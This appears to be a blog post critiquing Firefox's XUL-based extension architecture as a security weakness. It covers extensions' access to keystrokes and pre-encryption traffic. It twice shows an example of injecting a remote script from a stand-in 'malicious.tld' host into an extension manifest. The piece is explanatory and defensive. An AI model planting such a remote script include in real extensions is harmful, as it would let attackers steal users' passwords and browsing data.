"I agree, this isn't really novel.
It's an interesting POC, but if I have local access to your file system, there's tons easy ways to own you...
We just don't have systems that were designed to stand up to local access, case closed. An attacker could just as easily modify one of firefoxs own executables or libraries, your proxy settings, etc..."
So to Steve, thanks for setting me straight - and now with the "Big Picture" in mind I'm writing this as a 49,998ft view of the whole mess.
Let's think about this logically, since there are many things at play here. First off there's the use of XUL by FireFox for things like an extension manifest... which allows for arbitrary script tags! Granted most of the .xul files I first-hand witnessed were "chrome://xxxxx" but it could have just as easily been 'https://malicious.tld/malicious.js" or something of that nature. To say that this is a bad way of doing it is an understatement -but what's the real issue? The real issue is that Mozilla went for simplicity, speed, and extensibility over security - an obvious choice many times over. Next, let's look at the amount of effort it would take to somehow change this mechanism... Even if Mozilla did decide to change the way extensions function and MD5sum that file, and store it somewhere... or whatever they did - it would automatically break every since extension immediately... granted that Mozilla developers are famous for beaking extensions from version to version (even on minor revs??!!) but this would anger more than just a few people.
Next, let's think about the problem in a macro-chosm of nastiness on the web. We are taught not to trust the web, or anything that comes from a source you don't explicitly trust. But how do we know what to trust? I personally have at least 5 extensions in my FireFox browser that I never even pretended to look at the source code for. Are they stealing key strokes, logging my bank passwords?... who knows! The problem is that they pop up like mushrooms after a spring rain - and no one's realistically going to review them all... certainly not the Mozilla folks.
Perhaps the most hard-to-swallow design flaw with plugins is that they have access to the raw browser's stream... before it hits the encryption routines. This effectively means that not only does a plug-in have access to keystrokes, URLs, full-text of your POSTs but it has access to all that pre-encryption onto the SSL stream. Talk about game over!
In the final analysis, at least for me, it doesn't really matter that FireFox chooses to use XUL, which allows for an arbitrary script tag in extension manifest file... although that is a seriously neat trick. What really matters is that the attack surface of FireFox is laid bare through the plug-in/extension architecture which in my humble opinion is fundamentally flawed from a security perspective. It doesn't matter if we sign/encrypt/check-recheck that manifest file for a maliciously injected script src="http://malicious.tld/malicious.js" ... the browser is hosed anyway, long before that.
I'm hoping that this sparks the Mozilla folks to re-examine their architecture and seriously re-design their plugin/extension interface... I offer my humble support should it be requested.